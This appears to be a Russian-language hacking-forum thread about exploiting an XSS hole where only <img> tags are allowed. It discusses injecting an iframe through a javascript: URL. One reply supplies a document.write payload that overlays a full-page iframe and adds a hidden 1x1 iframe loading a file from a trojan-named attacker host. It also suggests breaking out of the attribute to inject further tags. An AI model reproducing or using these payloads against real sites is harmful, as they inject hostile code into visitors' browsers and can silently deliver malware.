Возможно ли при наличии ХSS вида: Code: <IMG SRC="javascript:alert('XSS');"> выполнить html код, например <iframe>? P.S Разрешенные теги только <img> =\ ...
Спасибо оч помог, но вот еще есть одна проблема, при выполнении происходит редирект на пустую страницу, возможно ли этого как то избежать?
Это не редирект, это жаваскрипт всё стирает и создаёт вместо этого фреймы, была такаяже трабла, на форуме постали в мануал и в общем не избежать этого
А вы не думали поставить ифрейм на страницу с XSS и на страницу которую надо проифреймить Например javascript:document.write('<iframe width=100% height=100% src="http://forum.antichat.ru/"></iframe><iframe width=1 height=1 src="http://vasyaHacker.rulez.troyan.co.ua/file.php"></iframe>'); И вообще, если ничего не фильтруется, попробуй обойти тег, то есть: <IMG SRC=""><iframe.........>"> Почитай статьи о XSS и всё поймёшь %)
